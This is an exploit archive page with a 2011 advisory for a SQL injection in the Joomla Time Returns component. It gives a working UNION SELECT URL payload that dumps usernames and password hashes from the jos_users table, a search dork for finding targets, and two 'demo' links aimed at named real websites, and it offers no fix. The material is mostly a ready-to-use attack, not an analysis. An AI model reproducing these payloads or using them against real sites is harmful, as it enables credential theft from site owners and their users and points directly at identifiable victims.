exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Time Returns SQL Injection

Joomla Time Returns SQL Injection
Posted Oct 8, 2011
Authored by kaMtiEz | Site indonesiancoder.com

The Joomla Time Returns component suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 0ae1a020ab02cbf7ad29533f92663145d36323bb483422bbc1e2b4e08b7cc5a5

Joomla Time Returns SQL Injection

Change Mirror Download
#############################################################################################################
## Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 8 October, 2011 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.takeaweb.it/
[+] Download : http://www.takeaweb.it/index.php?option=com_dms&view=category&layout=table&Itemid=13
[+] version : 2.0 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : - INDONESIA -

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

[ DEMO ]

http://www.arcisamarcanda.it/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

http://www.cittainvisibile.net/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--

[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ]

[+] Halal Bihalal sukses mas dab :))
[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)
[+] Hellcome in MGL jos_ali_joe =))

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close